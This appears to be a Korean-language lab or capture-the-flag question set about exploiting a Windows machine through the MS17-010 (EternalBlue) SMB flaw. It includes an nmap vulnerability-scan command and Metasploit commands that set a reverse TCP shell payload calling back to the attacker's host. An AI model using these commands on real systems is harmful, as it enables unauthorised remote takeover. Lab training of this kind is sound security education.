영상에서 어떤 프로그램을 이용해서 타겟 머신에 공격자가 접근 가능한지 확인하나요?
영상에서 어떤 프로그램을 이용해서 타겟 머신을 스캔하나요?
취약한 SMB 서비스를 스캔하기 위해서 어떤 nmap 스크립트를 사용했나요?
nmap -p 445 --script smb-vuln-ms17-010 -Pn -n --open -T4 10.10.18.199
메타스플로잇 프레임워크의 exploit/windows/smb/ms17_010_eternalblue 모듈을 사용해 익스플로잇을 진행할 때, 페이로드를 어떤걸로 바꿨었나요?
msfconsole
search ms17-010
use 0
set rhosts 10.10.18.199 [Target IP]
set lhost 10.4.17.111 [Host IP]
set payload windows/x64/shell/reverse_tcp
exploit
PWN 성공! 플래그를 입력해주세요. 플래그 형식은 flag{XYZ} 입니다. 플래그 파일을 출력한 뒤, 그냥 출력값을 모두 드래그 해서 복사/붙여넣기 하세요.